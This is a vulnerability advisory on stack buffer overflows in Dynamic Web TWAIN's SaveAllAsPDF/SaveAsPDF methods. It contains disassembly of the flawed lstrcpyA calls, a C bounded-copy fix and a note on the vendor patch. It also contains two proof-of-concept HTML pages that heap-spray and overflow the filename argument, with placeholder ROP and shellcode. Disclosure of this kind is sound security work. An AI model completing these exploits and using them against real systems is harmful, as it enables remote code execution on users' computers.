Introduction
Dynamic Web TWAIN is a TWAIN-based scanning SDK software specifically designed for web applications. With just a few lines of code, you can develop robust applications to scan documents from TWAIN-compatible scanners, edit the scanned images and save them to a file system.
Vulnerability Details
Two security vulnerabilities have been found in Dynamic Web TWAIN:
- DynamicWebTwainCtrl.DynamicWebTwain.1 ActiveXObject SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
- WebTWAINService.exe Service SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
DynamicWebTwainCtrl.DynamicWebTwain.1 ActiveXObject SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
The Dynamic Web TWAIN installs an ActiveX control with the following settings:
CLSID: {FFC6F181-A5CF-4ec4-A441-093D7134FBF2}
Progid: DynamicWebTwainCtrl.DynamicWebTwain.1
Binary Path: C:\Windows\SysWOW64\Dynamsoft\DynamicWebTwain\DynamicWebTwainCtrlTrial.dll
Implements IObjectSafety: False
Safe For Scripting (Registry): True
Safe For Initialization (Registry): True
According to the registry, this control is marked safe for scripting and safe for initialization, so Internet Explorer will allow its properties and methods to be scripted from a web page, subject to the user's browser security zone settings.
The ActiveX control exposes the SaveAllAsPDF and SaveAsPDF methods, as seen in the type library:
...
/* DISPID=355 */
/* VT_BOOL [11] */
function SaveAllAsPDF(
    /* VT_BSTR [8] [in] */ $FileName   <--------------
) {
    /* method SaveAllAsPDF */
}

/* DISPID=354 */
/* VT_BOOL [11] */
function SaveAsPDF(
    /* VT_BSTR [8] [in] */ $FileName,  <--------------
    /* VT_I2 [2] [in] */ $sImageIndex
) {
    /* method SaveAsPDF */
}
...
The FileName parameter is subject to a stack buffer overflow because it is copied into a fixed-size stack buffer with an unbounded call to lstrcpyA() inside DynamicWebTwainCtrlTrial.dll.
Vulnerable Code
Vulnerable code inside DynamicWebTwainCtrlTrial.dll:
;----------------------------------------------------------------------------------------------------
1003324F SUB_L1003324F:
...
10033290 F3AB          rep stosd
10033292 66AB          stosw
10033294 AA            stosb
10033295 8D85DCFEFFFF  lea eax,[ebp-00000124h]
1003329B 50            push eax
1003329C FF159C720710  call [KERNEL32.dll!lstrcpyA]    <--------- vulnerable call
100332A2 8D85DCFEFFFF  lea eax,[ebp-00000124h]
100332A8 6A04          push 00000004h
100332AA 50            push eax
...
;----------------------------------------------------------------------------
Exploit
<html>
<object classid="clsid:FFC6F181-A5CF-4ec4-A441-093D7134FBF2" id="obj"></object>
<body>
<div id="blah"></div>
<script>
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x100;
junk = unescape("%u0c0c%u0c0c");
while (junk.length < 0x1000) junk += junk;
rop = unescape("%u4141%u4141");
shellcode = unescape("%u4141%u4141");
data = junk.substring(0,offset) + rop + shellcode;
data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x800; i++) {
    var x = document.createElement("button");
    x.title = data.substring(0,0x40000-0x58);
    div_container.appendChild(x);
}
var xx="";
for(i=0;i<500;i++){ xx=xx+"A"; }
obj.SaveAllAsPDF(xx);
//obj.SaveAsPDF(xx,1);
</script>
</body>
</html>
WebTWAINService.exe Service SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
Similar to the ActiveX control above, WebTWAINService.exe, the local service that handles incoming requests from users (sent via the web browser), is vulnerable to the same flaw, reached through a different vector.
Vulnerable Code
Vulnerable code inside the WebTWAINService.exe:
;----------------------------------------------------------------------------------------------------
00462CE0 CASE_PROCTABLE_00462CE0:
00462CE0 282B4600      dd CASE_00462CE0_PROC0000
00462CE4 282B4600      dd CASE_00462CE0_PROC0000
00462CE8 4E2B4600      dd CASE_00462CE0_PROC0002
00462CEC 282B4600      dd CASE_00462CE0_PROC0000
00462CF0 3B2B4600      dd CASE_00462CE0_PROC0004
00462CF4 CCCCCCCCCCCCCCCCCCCC+ Align 16
00462D00 SUB_L00462D00:
00462D00 6AFF          push FFFFFFFFh
...
00462D8A 56            push esi
00462D8B 8D542440      lea edx,[esp+40h]
00462D8F 52            push edx
00462D90 FF1564034E00  call [KERNEL32.dll!lstrcpyA]    <--------- vulnerable call
...
;----------------------------------------------------------------------------------------------------
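Both listings above (the DLL copying into [ebp-0x124] and the service copying into [esp+0x40]) share the same defect: lstrcpyA() copies until it finds a NUL, with no knowledge of the destination size. The following C program is an added example, not Dynamsoft's code and not taken from the advisory; it models what a fixed SaveAllAsPDF/SaveAsPDF handler has to do before the FileName argument reaches a stack buffer. The buffer size FILENAME_BUF (0x124) is an assumption for illustration taken from the frame offset in the first listing; the real local array size is not given on the page. The function names are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed destination size for illustration: the DLL listing shows the
 * destination at [ebp-0x124]; the actual array size is not on the page. */
#define FILENAME_BUF 0x124

/* Bounded replacement for the lstrcpyA() pattern: copy src into dst only if
 * it fits together with the terminating NUL. Never reads src beyond dstsize
 * bytes, so an unterminated input cannot run the copy off the end either.
 * Returns true on success, false when the input is rejected. */
static bool copy_filename_bounded(char *dst, size_t dstsize, const char *src)
{
    if (dst == NULL || src == NULL || dstsize == 0)
        return false;

    size_t n = 0;
    while (n < dstsize && src[n] != '\0')
        n++;
    if (n == dstsize)            /* no room left for the NUL terminator */
        return false;

    memcpy(dst, src, n);
    dst[n] = '\0';
    return true;
}

/* Model of a fixed SaveAllAsPDF/SaveAsPDF entry point (hypothetical name):
 * the caller-supplied FileName is validated before it touches the stack
 * buffer. Returns 0 on success, -1 when the name is missing or too long. */
int save_all_as_pdf_hardened(const char *filename)
{
    char local[FILENAME_BUF];

    if (!copy_filename_bounded(local, sizeof local, filename))
        return -1;

    /* The real method would go on to write the PDF named in `local`;
     * that part is out of scope here. */
    return 0;
}

/* Test helper: build a constructed name of `len` 'A' characters, as the
 * PoC pages do, and feed it to the hardened handler. */
int try_name_of_length(size_t len)
{
    char buf[4096];

    if (len >= sizeof buf)
        return -1;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return save_all_as_pdf_hardened(buf);
}

int main(void)
{
    printf("\"scan.pdf\"           -> %d\n", save_all_as_pdf_hardened("scan.pdf"));
    printf("500 x 'A' (PoC size) -> %d\n", try_name_of_length(500));
    printf("0x123 chars (fits)   -> %d\n", try_name_of_length(FILENAME_BUF - 1));
    printf("0x124 chars (no NUL) -> %d\n", try_name_of_length(FILENAME_BUF));
    return 0;
}
```

The boundary cases are the ones that matter when reviewing a fix of this kind: an input of exactly the buffer size must be rejected because the terminator no longer fits, and the length scan itself must be capped at the destination size so that a missing NUL in the input cannot turn the check into another over-read. On Windows the same contract is available out of the box through strcpy_s() or StringCchCopyA(), which fail rather than overflow when the destination is too small.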
Exploit
<!DOCTYPE html>
<html>
<head>
<title> Dynamic Web TWAIN POC 02 </title>
<script>
function spray(){
    var x=[];
    for(i=0;i<300000;i++){x.push(new String("AAAA"))}
}
function crash(){
    var x="";
    for(i=0;i<1000000;i++){x+="AAAA"}
    var y="";
    for(i=0;i<100000;i++){y+="AAAA"}
    var a=window.navigator.appVersion;
    var b=a.match(/AppleWebKit/);
    var c=a[0]==="AppleWebKit";
    if (c===false){
        try{
            dwtcontrolContainer_Obj.SaveAllAsPDF(x) // Internet Explorer
        } catch(e){}
    };
    DWObject.SaveAsPDF(x); // Google Chrome, Firefox, Opera
}
</script>
<script type="text/javascript" language="javascript" src="Resources/dynamsoft.webtwain.initiate.js?t=150417"></script>
<script type="text/javascript" language="javascript" src="Resources/dynamsoft.webtwain.config.js"></script>
<script type="text/javascript" language="javascript" src="Scripts/online_demo_operation.js"></script>
<script type="text/javascript" language="javascript" src="Scripts/online_demo_initpage.js"></script>
<script type="text/javascript" language="javascript" src="Scripts/jquery.js"></script>
</head>
<body>
<div id="blah"></div>
<div id="DWTcontainer" class="body_Broad_width">
    <div id="dwtcontrolContainer"></div>
    <div id="DWTNonInstallContainerID"></div>
    <div id="DWTemessageContainer"></div>
</div>
<script>
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x100;
junk = unescape("%u0c0c%u0c0c");
while (junk.length < 0x1000) junk += junk;
rop = unescape("%u4141%u4141");
shellcode = unescape("%u4141%u4141");
data = junk.substring(0,offset) + rop + shellcode;
data += junk.substring(0,0x800-offset-rop.length-shellcode.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x800; i++) {
    var x = document.createElement("button");
    x.title = data.substring(0,0x40000-0x58);
    div_container.appendChild(x);
}
setTimeout(function(){crash()},6000);
</script>
</body>
</html>
Vendor Response
Dynamic Web TWAIN version 11.3 has been released to address the above listed issues: http://www.dynamsoft.com/Downloads/WebTWAIN_Download.aspx.